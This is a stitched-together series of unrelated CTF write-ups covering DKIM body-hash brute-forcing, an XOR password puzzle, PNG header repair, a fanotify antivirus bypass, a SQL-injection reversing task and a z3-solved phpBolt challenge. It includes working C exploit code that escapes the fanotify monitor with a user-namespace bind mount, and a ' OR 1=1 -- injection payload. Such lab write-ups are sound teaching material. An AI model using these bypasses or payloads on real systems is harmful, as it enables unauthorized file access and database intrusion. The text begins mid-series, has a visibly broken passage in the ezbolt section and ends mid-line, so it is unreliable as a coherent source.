## Pt. 2 In this part, we still have the same email file from the first part but need to find out what the redacted word inside the email was. I informed myself and after 15 minutes of researching I found out that the `DKIM-Signature:` Header is important, specifically the body hash `bh=`. We need to correctly canonicalize and hash the body to be able to bruteforce the lost word. I sent myself another email and tried calculating it myself. It was hard to find out the correct way... ### Calculating the correct hash ```pyfrom Crypto.Hash import SHA256 data = open("data").read()from base64 import b64encode def hash_body(body: str) -> str: canonicalized_body = body.strip().encode().replace(b"\n",b"\r\n") + b"\r\n" bh = b64encode(SHA256.new(canonicalized_body).digest()) return bh.decode() print(hash_body(data))``` With:```--0000000000002b27b205dcc6879cContent-Type: text/plain; charset="UTF-8" af --0000000000002b27b205dcc6879cContent-Type: text/html; charset="UTF-8" <div dir="ltr">af</div> --0000000000002b27b205dcc6879c--```Inside the data file. ### The solution Now that we are able to correctly calculate the body hash, we can finally brute force the lost word!I imported the body into my program and wrote a little script that could find the correct word from the original body hash and the rest of the email.Lets just hope that the word is not too long and only contains letters... ```--000000000000c0332a05dcab29d2Content-Type: text/plain; charset="UTF-8" Hey, crushed kiwi I hate this loop of college, and I need your help. Canyou meet me at lost immediately? --000000000000c0332a05dcab29d2Content-Type: text/html; charset="UTF-8"Content-Transfer-Encoding: quoted-printable <div dir=3D"ltr"><span>Hey, crushed kiwi I hate this loop of colle=ge, and I need your help. Can you meet me at=C2=A0</span>lost<span>=C2=A0immediately?</span></div> --000000000000c0332a05dcab29d2--``` ```pyimport sys from Crypto.Hash import SHA256 target = "5AqaoLYxMopB/cECaLwYX3ZR0XSAPW38Fwpy5WHeO2M=" # Body hash from the eml file (bh=)bod = open("data").read()from base64 import b64encode def hash_body(body: str) -> str: canonicalized_body = body.strip().encode().replace(b"\n",b"\r\n") + b"\r\n" bh = b64encode(SHA256.new(canonicalized_body).digest()) return bh.decode() print(hash_body(bod)) a = list("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ")for i in a: for ii in a: for iii in a: for iiii in a: e = i+ii+iii+iiii print(e) if hash_body(bod.replace("lost", e)) == target: print("Heureka!") sys.exit()``` That worked! The lost word was `abay`.
### Original writeup **[https://github.com/Samik081/ctf-writeups/blob/master/CrewCTF%202022/misc/foro_romano.md](https://github.com/Samik081/ctf-writeups/blob/master/CrewCTF%202022/misc/foro_romano.md)** ## Foro Romano (884 points) ### DescriptionI was reading Fasti by Ovid and something about the Forum Romanum set off a lighbulb in my head. Author : CSN3RD#0923 ### source (handout.py)```pythonrandseed = '66a48631d401c5e6b5e18'randpos = 7 dictionarium = ['gravida', 'tristique', 'nunc', 'ornare', 'luctus', 'velit', 'ullamcorper', 'quam', 'mi', 'aliquam', 'ac', 'eleifend', 'porttitor', 'cursus', 'nisl', 'vivamus', 'faucibus', 'nibh', 'blandit', 'venenatis', 'tortor', 'egestas', 'enim', 'orci', 'sit', 'dignissim', 'ipsum', 'urna', 'id', 'semper', 'quisque', 'maecenas', 'in', 'morbi', 'suspendisse', 'posuere', 'nam', 'nec', 'eget', 'sagittis', 'est', 'auctor', 'dictum', 'nullam', 'amet', 'arcu', 'consequat', 'pulvinar', 'ligula', 'lacus', 'justo', 'elementum', 'pharetra', 'viverra', 'neque', 'sed']hexed_dict = ["".join("{:02x}".format(ord(c)) for c in word) for word in dictionarium]hexed_dict[randpos] = randseedint_dict = [int(c, 16) for c in hexed_dict] passwd = input("Welcome to Foro Romano. You must enter the password to enter: ")bined_passwd = "".join("{0:b}".format(ord(c)).zfill(7) for c in passwd) key_str = 's3cr3t_k3y'hexed_key = "".join("{:02x}".format(ord(c)) for c in key_str)int_key = int(hexed_key,16) xor = 0 assert(len(bined_passwd) == len(int_dict)) for i in range(len(bined_passwd)): if bined_passwd[i] == '1': xor = xor ^ int_dict[i] if xor == int_key: FLAG = 'crew{{{}}}'.format(passwd) print("Flag:", FLAG)else: print("Wrong password!")``` ## Solution### ApproachWe are given dictionary of 56 strings and a secret key. Secret key gets converted to it's number representation The strings are being XORed based on the user input (password):1. password (each character) is converted to its binary representation2. the padding of binary representation of each character is set to 7 (so, for example, 'a' is `0x1100001`, not `0x01100001`) **(IMPORTANT)**3. the strings are concatenated into a "binary password"4. `xor = 0`5. then, for each `n` of the "binary password" bit (0, 1), if it's 1, then `xor = xor ^ dictionary_string[n_index]`6. if int representation of secret key `int_key == xor`, we get the flag This means, that we choose which dictionary strings are going to be XORed by changing the **input password**. Our job is now to :1. find the correct strings, that XORed together will give the key2. get the "binary password" - created from the correct dictionary string indexes (`1` if the string should be XORed) 3. convert obtained "binary password" to the **input password** format: 1. split the binary string to the groups of 7 2. (optional, for nice output ^^) add 0 at the left to get all 8 bits 3. convert each group of binary number to the string (`chr()`) 4. check if character is printable - we can get multiple candidates, but the password is going to be the flag, so it has to be printable 5. concatenate character to the password4. read the password5. get the flag ### Choosing correct dictionary stringsTo find the correct strings to be XORed, we should notice few things:- dictionary strings differ in length.- longest string is 11 characters long, which gives us 88 bits (with leading zeros to pad to the whole byte) when presented as binary- when XORing strings, we actually XOR character by character - byte by byte - bit by bit- this means, that the very beginning of the XOR result can be "manipulated" only with the longest strings and,- that each character in the secret key string representation of XOR result, can be affected by the dictionary string only if the string is long enough to cover this character position Having this knowledge, we can craft our password starting with the longest strings in such fashion:1. Group dictionary strings by their length and assign the groups to the bytes (`[byte_0 => ['X', 'Y', 'Z'], byte_1 => ['A', 'B', 'C']]`)2. `n = 0`, 3. find all permutations of `0` and `1` based on how many dictionary strings correspond to the byte `n`4. for each permutation (for example `['0', '1', '1]`), set the value of permutation element in the "binary password", at the position corresponding to index of dictionary string5. calculate XOR for the chosen strings 6. check if character representation of byte `XOR_result[n]`is the same as `secret_key[n]`7. if yes, go to `3.` (else return, those values don't provide us the needed character)8. if `n == 11` (length of the longest string and the final byte), 9. convert "binary password" to the readable string and **get the flag** ### Implementation in python```pythonimport itertools # from sourcefile --> randseed = '66a48631d401c5e6b5e18'randpos = 7 key_str = 's3cr3t_k3y'hexed_key = "".join("{:02x}".format(ord(c)) for c in key_str)int_key = int(hexed_key, 16) dictionarium = ['gravida', 'tristique', 'nunc', 'ornare', 'luctus', 'velit', 'ullamcorper', 'quam', 'mi', 'aliquam', 'ac', 'eleifend', 'porttitor', 'cursus', 'nisl', 'vivamus', 'faucibus', 'nibh', 'blandit', 'venenatis', 'tortor', 'egestas', 'enim', 'orci', 'sit', 'dignissim', 'ipsum', 'urna', 'id', 'semper', 'quisque', 'maecenas', 'in', 'morbi', 'suspendisse', 'posuere', 'nam', 'nec', 'eget', 'sagittis', 'est', 'auctor', 'dictum', 'nullam', 'amet', 'arcu', 'consequat', 'pulvinar', 'ligula', 'lacus', 'justo', 'elementum', 'pharetra', 'viverra', 'neque', 'sed'] hexed_dict = ["".join("{:02x}".format(ord(c)) for c in word) for word in dictionarium]hexed_dict[randpos] = randseedint_dict = [int(c, 16) for c in hexed_dict] # extracted this to functiondef do_xor(passwd): xor = 0 for k in range(len(passwd)): if passwd[k] == '1': xor = xor ^ int_dict[k] return xor # <-- from sourcefile # helper function to convert ints to stringsdef number_to_string(number): hx = hex(number)[2:] if len(hx) % 2: # padding for appended randseed hx = '0' + hx return bytearray.fromhex(hx).decode('ascii') # groups dictionary strings by its lengths## list index is the length of a string# value contains the list of dictionary indexes## Value for the challenge: [[], [], [8, 10, 28, 32], [24, 36, 37, 40, 55], [2, 14, 17, 22, 23, 27, 38, 44, 45], [5,# 26, 33, 49, 50, 54], [3, 4, 13, 20, 29, 41, 42, 43, 48], [0, 9, 15, 18, 21, 30, 35, 53], [11, 16, 31, 39, 47, 52],# [1, 12, 19, 25, 46, 51], [], [6, 7, 34]]def group_dict_by_length(): lengths = [[], [], [], [], [], [], [], [], [], [], [], []] for idx, string in enumerate(int_dict): lengths[len(number_to_string(string))].append(idx) return lengths # traverse through the possible permutations to find candidates for a given bytedef traverse(byte_no, base, dict_indexes_grouped_by_length): if byte_no == 11: # we reached the final byte # because of the zfill(7) while "binning" the password, we split binary by 7 and add missing padding output = '0' + " 0".join([base[i:i + 7] for i in range(0, len(base), 7)]) password = '' for char in output.split(' '): if not chr(int(char, 2)).isprintable(): return password += chr(int(char, 2)) print('output with missing paddings: ', output) print('binary without paddings: ', base) print(f'flag: crew{{{password}}}') return # get indexes of dictionary strings that might affect given byte dict_indexes = dict_indexes_grouped_by_length[len(dict_indexes_grouped_by_length) - byte_no - 1] # calculate all the possible permutations of adding those strings to the xor chain perms = ["".join(seq) for seq in itertools.product("01", repeat=len(dict_indexes))] for perm in perms: binary_password = list(base) for perm_idx, str_idx in enumerate(dict_indexes): binary_password[str_idx] = perm[perm_idx] # substitute permutation values at given indexes binary_password = "".join(binary_password) assert (len(binary_password) == len(int_dict)) xor = do_xor(binary_password) xor_byte = number_to_string(xor).rjust(11, '\x00')[byte_no] # fill to 11 so we can compare bytes key_byte = number_to_string(int_key).rjust(11, '\x00')[byte_no] if xor_byte == key_byte: # byte in this xor matches the byte in the key traverse(byte_no + 1, binary_password, dict_indexes_grouped_by_length) # go deeper! return lengths = group_dict_by_length()traverse(0, '0' * 56, lengths) ``` ### Result```output with missing paddings: 01001101 01001001 01010100 01001101 01011111 01000100 01010000 00100001binary without paddings: 10011011001001101010010011011011111100010010100000100001flag: crew{MITM_DP!}```
# The Legend of the Chozo This challenge is perfect to analyze in depth the different components that PNG files have and learn how to reassemble these components to reconstruct the evidence and process it (read the flag). Challenge Description: ```bashThe Legend of the Chozo100MediumSamus extracted this file from the site on the last expedition, but it appears to have been corrupted! This may be the lead we've been looking for to bring peace to the galaxy. Can you Identify what it once was and possibly restore it? Author: delphi``` We were given a file to download ([source here](https://github.com/leonuz/CTFs/raw/main/stuff/CorruptedData.chr)) ```bash┌──(leonuz㉿sniper)-[~/SpaceHeroesCTF/Forensics/The_Legend_of_the_Chozo]└─$ ls -l total 64-rw-r--r-- 1 leonuz leonuz 61816 Feb 6 18:48 CorruptedData.chr```Start by analyzing this file whit the unix/linux command [`file`](https://linux.die.net/man/1/file) ```bash┌──(leonuz㉿sniper)-[~/SpaceHeroesCTF/Forensics/The_Legend_of_the_Chozo]└─$ file CorruptedData.chr CorruptedData.chr: data````file` won't recognize it, but inspecting the header we can see strings which are common in PNG files. ```bash ┌──(leonuz㉿sniper)-[~/SpaceHeroesCTF/Forensics/The_Legend_of_the_Chozo]└─$ hd CorruptedData.chr | head 00000000 50 47 89 0a 4e 0d 0a 1a 0d 48 44 00 52 00 00 49 |PG..N....HD.R..I|00000010 00 00 00 f0 00 00 01 39 08 06 00 00 00 ae c5 ad |.......9........|00000020 5a 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 |Z....sRGB.......|00000030 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 |..gAMA......a...|00000040 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 |. cHRM..z&......|00000050 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 |........u0...`..|00000060 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 09 70 48 |:....p..Q<....pH|00000070 59 73 00 00 24 e8 00 00 24 e8 01 82 63 05 1c 00 |Ys..$...$...c...|00000080 00 f0 e1 49 44 41 54 78 5e ec fd 01 b4 66 59 76 |...IDATx^....fYv|00000090 d7 87 dd b1 1e 52 31 2a 0d 4f f0 92 55 8a 0b 5c |.....R1*.O..U..\| ``` According to the [PNG Specification](http://www.libpng.org/pub/png/spec/1.2/PNG-Structure.html#PNG-file-signature), the structure of the header is always represented by eight fixed bytes, and the remaining parts consist of three or more chunks of PNG data in a specific order. **PNG header:** `89 50 4E 47 0D 0A 1A 0A` + chunk + chunk + chunk... so let's go ahead and fix that. But first we make a copy of the file and change the file extension to .png ```bash┌──(leonuz㉿sniper)-[~/SpaceHeroesCTF/Forensics/The_Legend_of_the_Chozo]└─$ cp CorruptedData.chr image.png ```we use [printf](https://man7.org/linux/man-pages/man3/printf.3.html) and [dd](https://man7.org/linux/man-pages/man1/dd.1.html) to modify the file, but it can be done with any hexadecimal editor such as hexeditor or xxd ```bash ┌──(leonuz㉿sniper)-[~/SpaceHeroesCTF/Forensics/The_Legend_of_the_Chozo]└─$ printf '\x89\x50\x4E\x47\x0D\x0A\x1A\x0A' | dd of=image.png bs=1 seek=0 count=8 conv=notrunc8+0 records in8+0 records out8 bytes copied, 0.000204744 s, 39.1 kB/s```review the header... we see something odd in the chunk section. ```bash┌──(leonuz㉿sniper)-[~/SpaceHeroesCTF/Forensics/The_Legend_of_the_Chozo]└─$ hd image.png| head00000000 89 50 4e 47 0d 0a 1a 0a 0d 48 44 00 52 00 00 49 |.PNG.....HD.R..I|00000010 00 00 00 f0 00 00 01 39 08 06 00 00 00 ae c5 ad |.......9........|00000020 5a 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 |Z....sRGB.......|00000030 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 |..gAMA......a...|00000040 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 |. cHRM..z&......|00000050 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 |........u0...`..|00000060 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 09 70 48 |:....p..Q<....pH|00000070 59 73 00 00 24 e8 00 00 24 e8 01 82 63 05 1c 00 |Ys..$...$...c...|00000080 00 f0 e1 49 44 41 54 78 5e ec fd 01 b4 66 59 76 |...IDATx^....fYv|00000090 d7 87 dd b1 1e 52 31 2a 0d 4f f0 92 55 8a 0b 5c |.....R1*.O..U..\|```check the file... ```bash┌──(leonuz㉿sniper)-[~/SpaceHeroesCTF/Forensics/The_Legend_of_the_Chozo]└─$ file CorruptedData.chr CorruptedData.chr: data````file` won't recognize it yet, so we need continue fix it. We know that after the header come a series of [chunks](http://www.libpng.org/pub/png/spec/1.2/PNG-Chunks.html). PNG contains two types of chunks: one called critical chunks that are the standard chunks, another called ancillary chunks that are optional. Each chunk starts with 4 bytes for the length of the chunk, 4 bytes for the type, then the chunk content itself (with the length declared earlier) and 4 bytes of a checksum. The first chunk is IHDR and has the length of 0xD, so let's fix that first. ```bash┌──(leonuz㉿sniper)-[~/SpaceHeroesCTF/Forensics/The_Legend_of_the_Chozo]└─$ printf '\x00\x00\x00\x0D\x49\x48\x44\x52' | dd of=image.png bs=1 seek=8 count=8 conv=notrunc8+0 records in8+0 records out8 bytes copied, 7.9847e-05 s, 100 kB/s```check the header, everything seems to be fine now... ```bash┌──(leonuz㉿sniper)-[~/SpaceHeroesCTF/Forensics/The_Legend_of_the_Chozo]└─$ hd CorruptedData.chr | head 00000000 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 |.PNG........IHDR|00000010 00 00 00 f0 00 00 01 39 08 06 00 00 00 ae c5 ad |.......9........|00000020 5a 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 |Z....sRGB.......|00000030 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 |..gAMA......a...|00000040 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 |. cHRM..z&......|00000050 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 |........u0...`..|00000060 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 09 70 48 |:....p..Q<....pH|00000070 59 73 00 00 24 e8 00 00 24 e8 01 82 63 05 1c 00 |Ys..$...$...c...|00000080 00 f0 e1 49 44 41 54 78 5e ec fd 01 b4 66 59 76 |...IDATx^....fYv|00000090 d7 87 dd b1 1e 52 31 2a 0d 4f f0 92 55 8a 0b 5c |.....R1*.O..U..\| ``` check the file again... ```bash ┌──(leonuz㉿sniper)-[~/SpaceHeroesCTF/Forensics/The_Legend_of_the_Chozo]└─$ file image.png image.png: PNG image data, 240 x 313, 8-bit/color RGBA, non-interlaced````file` already recognizes it!!! Let's try another tool called [`pngcheck`](http://www.libpng.org/pub/png/apps/pngcheck.html), this tool verifies the integrity of PNG files by checking the internal checksums, and decompressing the image data. ```bash┌──(sniper㉿sniperkal)-[~/SpaceHeroesCTF/Forensics/The_Legend_of_the_Chozo]└─$ pngcheck -v image.png File: image.png (61816 bytes) chunk IHDR at offset 0x0000c, length 13 240 x 313 image, 32-bit RGB+alpha, non-interlaced chunk sRGB at offset 0x00025, length 1 rendering intent = perceptual chunk gAMA at offset 0x00032, length 4: 0.45455 chunk cHRM at offset 0x00042, length 32 White x = 0.3127 y = 0.329, Red x = 0.64 y = 0.33 Green x = 0.3 y = 0.6, Blue x = 0.15 y = 0.06 chunk pHYs at offset 0x0006e, length 9: 9448x9448 pixels/meter (240 dpi) chunk IDAT at offset 0x00083, length 61665 zlib: deflated, 32K window, fast compression chunk IEND at offset 0x0f170, length 0No errors detected in image.png (7 chunks, 79.4% compression).````pngcheck` has No errors detected!!! We fix the file and now its posible to open it to get the flag. flag shctf{CH0Z0_rU1N5} - - - ### Final Notes. All incident response teams should know the necessary techniques for file reconstruction as well, as at least, know this [NIST](https://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpublication800-86.pdf) recommendations. thanks, [FITSEC Team](https://research.fit.edu/fitsec/) for the excellent CTF. For fun and knowledge, always think out of the box! :)
# 0AV* Category: `Misc`* Solves: `12`* Points: `256`* Description: `This anti-virus prevents me from reading the flag. Can you read /playground/flag.txt anyhow?` In this challenge, we're provided source code (`antivirus.c`), as well as a `bzImage` and `rootfs.cpio` file we can use to boot the kernel.Let's run qemu and give it a look. ```shStarting syslogd: OKStarting klogd: OKRunning sysctl: OKSaving random seed: OKStarting network: OKStarting dhcpcd...dhcpcd-9.4.1 startingforked to background, child pid 82 Boot took 4.19 seconds [ Native Protection - zer0pts CTF 2022 ]/ $ iduid=1337 gid=1337 groups=1337/ $ ls -latotal 4[ ... ]drwxrwxrwx 2 root root 60 Feb 20 07:51 playground[ ... ]/ $ cd playground/playground $ ls -latotal 4drwxrwxrwx 2 root root 60 Feb 20 07:51 .drwxr-xr-x 18 root root 420 Feb 20 07:53 ..-rwxrwxrwx 1 root root 28 Feb 20 07:51 flag.txt/playground $ cat flag.txtcat: can't open 'flag.txt': Operation not permitted/playground $ ls -latotal 0drwxrwxrwx 2 root root 40 Mar 20 13:17 .drwxr-xr-x 18 root root 420 Feb 20 07:53 ..``` Even though we have permissions to read the flag, we're denied access and the file was deleted. Let's check out `antivirus.c`. ```c#include <errno.h>#include <fcntl.h>#include <limits.h>#include <poll.h>#include <stdio.h>#include <stdlib.h>#include <string.h>#include <syslog.h>#include <sys/fanotify.h>#include <unistd.h> static int scanfile(int fd) { char path[PATH_MAX]; ssize_t path_len; char procfd_path[PATH_MAX]; char buf[0x10]; if (read(fd, buf, 7) != 7) return 0; if (memcmp(buf, "zer0pts", 7)) return 0; /* Malware detected! */ snprintf(procfd_path, sizeof(procfd_path), "/proc/self/fd/%d", fd); if ((path_len = readlink(procfd_path, path, sizeof(path) - 1)) == -1) { perror("readlink"); exit(EXIT_FAILURE); } path[path_len] = '\0'; unlink(path); return 1;} static void handle_events(int fd) { const struct fanotify_event_metadata *metadata; struct fanotify_event_metadata buf[200]; ssize_t len; struct fanotify_response response; for (;;) { /* Check fanotify events */ len = read(fd, buf, sizeof(buf)); if (len == -1 && errno != EAGAIN) { perror("read"); exit(EXIT_FAILURE); } if (len <= 0) break; metadata = buf; while (FAN_EVENT_OK(metadata, len)) { if (metadata->vers != FANOTIFY_METADATA_VERSION) { fputs("Mismatch of fanotify metadata version.\n", stderr); exit(EXIT_FAILURE); } if ((metadata->fd >= 0) && (metadata->mask & FAN_OPEN_PERM)) { /* New access request */ if (scanfile(metadata->fd)) { /* Malware detected! */ response.response = FAN_DENY; } else { /* Clean :) */ response.response = FAN_ALLOW; } response.fd = metadata->fd; write(fd, &response, sizeof(response)); close(metadata->fd); } metadata = FAN_EVENT_NEXT(metadata, len); } }} int main(void) { int fd; /* Setup fanotify */ fd = fanotify_init(FAN_CLOEXEC | FAN_CLASS_CONTENT | FAN_NONBLOCK, O_RDONLY); if (fd == -1) { perror("fanotify_init"); exit(EXIT_FAILURE); } /* Monitor every file under root directory */ if (fanotify_mark(fd, FAN_MARK_ADD | FAN_MARK_MOUNT, FAN_OPEN_PERM, AT_FDCWD, "/") == -1) { perror("fanotify_mark"); exit(EXIT_FAILURE); } for (;;) { handle_events(fd); } exit(EXIT_SUCCESS);}``` Most of this is boilerplate, setting up an [fanotify](https://man7.org/linux/man-pages/man7/fanotify.7.html) listener. Whenever we attempt to open a file located on the `/` mount, the kernel will notify this executable. It will read from the file we attempt to access - if it begins with `zer0pts`, it will be denied and then `unlink`'d. Luckily, the man page has the answer for us: ```Bugs:[ ... ] As of Linux 3.17, the following bugs exist: * On Linux, a filesystem object may be accessible through multiple paths, for example, a part of a filesystem may be remounted using the --bind option of mount(8). A listener that marked a mount will be notified only of events that were triggered for a filesystem object using the same mount. Any other event will pass unnoticed.``` We can simply perform a bind mount, and accesses to the file through it will not trigger the `fanotify` listener. Mounting requires `CAP_SYS_ADMIN`, but the kernel has unprivileged user namespaces available. We can use this to enter a new mount namespace, bind mount `/playground` to a controlled directory, and read the content of the flag: ```c#define _GNU_SOURCE#include <sched.h>#include <fcntl.h>#include <stdlib.h>#include <sys/mount.h>#include <unistd.h>#include <stdio.h> int main() { if (unshare(CLONE_NEWUSER|CLONE_NEWNS)) { perror("unshare"); exit(0); }; mkdir("/tmp/mount"); if (mount("/playground", "/tmp/mount", NULL, MS_BIND, NULL)) { perror("mount"); exit(0); } int fd = open("/tmp/mount/flag.txt", O_RDONLY); if (fd == -1) {perror("Opening"); exit(0);} char buf[100]; int res = read(fd, buf, 100); buf[res] = 0; puts(buf);}```After uploading this on the remote instance, we get the flag printed out: `zer0pts{FANOTIFY_d03snt_w0rk_b3tw33n_d1ff3r3nt_n4m3sp4c3s...}`
I took part to the [DCTF 2022](https://ctftime.org/event/1569) with the team [Ulisse](https://ulis.se/) of the University of Bologna. The Bookstore.java challenge stated that: > Someone who doesn't care about bandwidth usage decided to package both the server and client binaries in a single file... The server of course is meant to run on linux, and the client on Windows. We get a PowerShell file [`eulers_license.ps1`](/eulers_license.ps1) that contains:- a `binary_linux` var containing the server code encoded in base64.- a `binary_win` var containing the client code also encoded in base64. ## The linux binary The linux binary is very easy to reverse. In fact by decoding it we get a python server which has a huge SQLi vuln: ```pythonlice = request.args.get("license_key")query = "SELECT * FROM license_keys WHERE license_key = '" + lice + "';"``` we can proceed with a basic SQLi like `' OR 1=1 -- ` and get the first part of the flag (which is the second one really): > `_python_is_easy_to_reverse}` ## The windows binary The windows exe is a little bit harder to reverse. By looking at it with ghidra we understand that it must be:- a 10 digits number- a prime number- it has something to do with Euler By a combination of chance and testing we come across the number [`2147483647`](https://en.wikipedia.org/wiki/2,147,483,647) which is a prime number discovered by Euler. Providing this input to the client gives us the output:```Enter eulers license key: 2147483647dctf{2147483647Failed to contact euler.dragonsec.si for license confirmation...``` > `dctf{2147483647_python_is_easy_to_reverse}`
# ezbolt (Rev) phpBolt - Best php encoder: Encrypt and decrypt php source code. Ensure only licensed people are using. Free for small and medium companies. Encode and run PHP files. Ioncube alternative (free) Waste of time (free) Ezbolt was a reversing challenge from CrewCTF, among 700+ teams, only ~20 teams solved it. The challenge had something todo with phpBolt which is an open source encoding project that can be found [here](https://github.com/arshidkv12/phpBolt). Authors provided the following file:```phpmemcpy(0x7fb350886018, ```This looks like the original code, which means that we have successfully retrieved the code. However, the code is completley obfuscated, which I do believe this is why others struggled with it a bit. I took a smarter approach where I did some string replacements, some minor enhancements, and this was the result: ```python...snip...flag[26]+flag[18]-flag[37]*flag[9]==-2844flag[36]^flag[13]-flag[27]==46flag[14]^flag[15]*flag[32]^flag[35]-flag[21]==11194flag[9]^flag[11]*flag[14]-flag[10]^flag[31]==5811flag[10]-flag[27]+flag[28]^flag[35]+flag[37]==19flag[29]+flag[23]*flag[21]==10545flag[28]+flag[0]*flag[24]==9915flag[29]-flag[26]*flag[3]==-11805flag[24]+flag[29]-flag[4]*flag[35]+flag[32]==-14592flag[16]-flag[25]^flag[22]*flag[27]==2573flag[19]^flag[11]*flag[16]==9848flag[19]^flag[28]-flag[38]+flag[27]^flag[3]==55flag[4]-flag[2]+flag[25]==70flag[21]*flag[13]-flag[14]*flag[3]==201flag[19]+flag[14]-flag[11]*flag[36]+flag[21]==-3578...snip...``` These looked like constrains, I simply used z3 to solve the challenge, I came up with the following script: ```pythonfrom z3_staff import * # https://github.com/KosBeg/z3_staff flag = create_vars(39, size=8) # create and return 39 BitVecs with size 8s = solver() # create and return solverset_ranges() # set ASCII ranges(printable chars) for all vars created by create_vars set_known_bytes('crew{*}', type='ff') # set known flag format, or we can use without ", type='ff'" like "set_known_bytes('crew{' + '*'* + '}')" # add all known equationsadd_eq(flag[26]+flag[18]-flag[37]*flag[9]==-2844)add_eq(flag[36]^flag[13]-flag[27]==46)add_eq(flag[14]^flag[15]*flag[32]^flag[35]-flag[21]==11194)add_eq(flag[9]^flag[11]*flag[14]-flag[10]^flag[31]==5811)add_eq(flag[10]-flag[27]+flag[28]^flag[35]+flag[37]==19)add_eq(flag[29]+flag[23]*flag[21]==10545)add_eq(flag[28]+flag[0]*flag[24]==9915)add_eq(flag[29]-flag[26]*flag[3]==-11805)add_eq(flag[24]+flag[29]-flag[4]*flag[35]+flag[32]==-14592)add_eq(flag[16]-flag[25]^flag[22]*flag[27]==2573)add_eq(flag[19]^flag[11]*flag[16]==9848)add_eq(flag[19]^flag[28]-flag[38]+flag[27]^flag[3]==55)add_eq(flag[4]-flag[2]+flag[25]==70)add_eq(flag[21]*flag[13]-flag[14]*flag[3]==201)add_eq(flag[19]+flag[14]-flag[11]*flag[36]+flag[21]==-3578)add_eq(flag[26]^flag[33]*flag[8]==7100)add_eq(flag[36]*flag[7]-flag[21]==3601)add_eq(flag[16]-flag[1]^flag[33]==-114)add_eq(flag[37]^flag[8]-flag[21]+flag[16]==8)add_eq(flag[34]^flag[25]*flag[18]+flag[21]==3950)add_eq(flag[27]-flag[28]^flag[6]*flag[1]==-11887)add_eq(flag[27]+flag[31]-flag[5]+flag[21]==85)add_eq(flag[18]^flag[29]*flag[16]+flag[0]*flag[5]==18988)add_eq(flag[14]-flag[30]+flag[29]==32)add_eq(flag[27]-flag[37]^flag[9]+flag[0]*flag[20]==-7980)add_eq(flag[28]*flag[33]^flag[25]-flag[2]+flag[6]==12331)add_eq(flag[24]^flag[23]*flag[6]+flag[37]*flag[22]==14686)add_eq(flag[11]*flag[31]^flag[25]-flag[16]*flag[22]==-1944)add_eq(flag[10]+flag[36]*flag[18]==2748)add_eq(flag[12]-flag[21]*flag[31]==-4750)add_eq(flag[22]+flag[26]^flag[13]==213)add_eq(flag[19]^flag[30]+flag[22]-flag[20]^flag[21]==98)add_eq(flag[12]+flag[37]*flag[34]==3182)add_eq(flag[0]*flag[12]-flag[26]+flag[5]^flag[16]==9373)add_eq(flag[37]-flag[13]^flag[38]==-128)add_eq(flag[14]+flag[19]*flag[10]+flag[28]-flag[21]==11302)add_eq(flag[20]^flag[14]*flag[1]==5862)add_eq(flag[17]+flag[15]^flag[9]==226)add_eq(flag[24]-flag[30]^flag[29]==-82)add_eq(flag[36]+flag[25]^flag[12]==14)add_eq(flag[4]*flag[13]-flag[5]==8006)add_eq(flag[14]*flag[10]-flag[28]==5394)add_eq(flag[15]+flag[28]*flag[1]^flag[20]==13159)add_eq(flag[37]+flag[38]^flag[12]==227)add_eq(flag[32]+flag[23]-flag[22]*flag[1]+flag[20]==-5527)add_eq(flag[20]-flag[27]^flag[29]*flag[3]-flag[7]==11172)add_eq(flag[32]*flag[31]-flag[9]*flag[24]==195)add_eq(flag[25]*flag[26]^flag[9]-flag[19]==-4856)add_eq(flag[18]+flag[2]*flag[0]-flag[16]^flag[37]==10036)add_eq(flag[0]^flag[35]*flag[30]==13697)add_eq(flag[26]+flag[9]^flag[14]+flag[7]^flag[4]==76)add_eq(flag[34]+flag[18]*flag[38]-flag[32]==9952)add_eq(flag[7]-flag[0]+flag[36]-flag[11]==-70)add_eq(flag[31]*flag[37]+flag[29]==3308)add_eq(flag[25]^flag[21]*flag[38]==11859)add_eq(flag[26]^flag[10]+flag[5]==184)add_eq(flag[16]-flag[10]*flag[25]==-5100)add_eq(flag[36]^flag[13]+flag[1]*flag[23]==12575)add_eq(flag[17]^flag[29]-flag[8]+flag[18]==50)add_eq(flag[3]-flag[32]*flag[23]==-10551)add_eq(flag[10]^flag[31]+flag[4]^flag[11]-flag[27]==131)add_eq(flag[35]-flag[18]*flag[9]+flag[15]-flag[8]==-3670)add_eq(flag[0]^flag[28]*flag[7]+flag[19]==12843)add_eq(flag[15]^flag[11]+flag[35]==158)add_eq(flag[38]-flag[25]^flag[37]==114)add_eq(flag[3]+flag[22]*flag[25]-flag[15]+flag[27]==2503)add_eq(flag[17]^flag[11]-flag[16]+flag[19]*flag[8]==6831)add_eq(flag[38]*flag[11]^flag[33]-flag[8]==14478)add_eq(flag[9]*flag[12]^flag[2]==4533)add_eq(flag[9]*flag[6]^flag[16]==5076)add_eq(flag[23]-flag[22]^flag[14]+flag[10]*flag[17]==10364)add_eq(flag[28]+flag[21]*flag[18]==7714)add_eq(flag[0]+flag[18]-flag[5]^flag[3]-flag[9]==4)add_eq(flag[20]+flag[21]*flag[31]==4925)add_eq(flag[19]-flag[34]*flag[17]-flag[32]^flag[37]==-4633)add_eq(flag[36]^flag[34]*flag[16]^flag[33]*flag[22]==1457)add_eq(flag[34]-flag[32]*flag[24]^flag[37]==-9583)add_eq(flag[0]+flag[9]*flag[17]-flag[2]==4558)add_eq(flag[35]+flag[26]-flag[13]+flag[34]^flag[10]==160)add_eq(flag[6]+flag[22]-flag[8]^flag[3]==46)add_eq(flag[10]*